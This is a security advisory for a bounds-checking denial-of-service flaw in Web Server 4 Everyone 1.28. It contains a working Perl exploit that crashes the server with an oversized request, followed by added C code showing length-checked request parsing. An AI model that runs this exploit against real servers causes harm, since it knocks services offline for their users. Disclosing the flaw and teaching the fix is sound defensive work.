Web Server 4 Everyone is an easy-to-use web server. A security vulnerability in the product allows remote attackers to cause it to stop responding to legitimate requests.
Credit:
The information has been provided by Tamer Sahin.
Vulnerable systems:
* Web Server 4 Everyone version 1.28 and prior
The problem is that Web Server 4 Everyone does not perform adequate bounds checking. When an attacker sends a request 2000 characters in size with a "Host:" field that contains "127.0.0.1", the server crashes. The web server must be restarted to regain normal functionality.
Exploit:
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;
print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";
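
On the defensive side of the bounds-checking problem described above, the following C code is an added example, not code from the original advisory or from Web Server 4 Everyone: it measures the request target before copying it and answers 414 (URI Too Long) when it does not fit. The function name `parse_request_line` and the `MAX_TARGET` limit of 1024 bytes are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 1024   /* assumed limit; not taken from the product */

/* Returns an HTTP status: 200 parsed, 400 malformed, 414 target too long.
 * req need not be NUL-terminated; len is the number of bytes received. */
int parse_request_line(const char *req, size_t len,
                       char *target, size_t target_cap)
{
    const char *eol = memchr(req, '\n', len);
    if (eol == NULL)
        return 400;                       /* no complete request line */
    size_t line_len = (size_t)(eol - req);
    if (line_len > 0 && req[line_len - 1] == '\r')
        line_len--;                       /* accept CRLF or bare LF */

    /* Expected shape: METHOD SP target SP version */
    const char *sp1 = memchr(req, ' ', line_len);
    if (sp1 == NULL || sp1 == req)
        return 400;
    const char *t = sp1 + 1;
    size_t rest = line_len - (size_t)(t - req);
    const char *sp2 = memchr(t, ' ', rest);
    if (sp2 == NULL || sp2 == t)
        return 400;
    size_t tlen = (size_t)(sp2 - t);

    /* The bounds check: the length is compared before any copy happens. */
    if (tlen > MAX_TARGET || tlen >= target_cap)
        return 414;
    memcpy(target, t, tlen);
    target[tlen] = '\0';
    return 200;
}

int main(void)
{
    /* Constructed sample: a request line with a 2000-byte target. */
    char req[2100], target[MAX_TARGET + 1];
    size_t n = 5;
    memcpy(req, "GET /", 5);
    memset(req + n, 'A', 2000); n += 2000;
    memcpy(req + n, " HTTP/1.1\n", 10); n += 10;
    printf("status %d\n", parse_request_line(req, n, target, sizeof target));
    return 0;
}
```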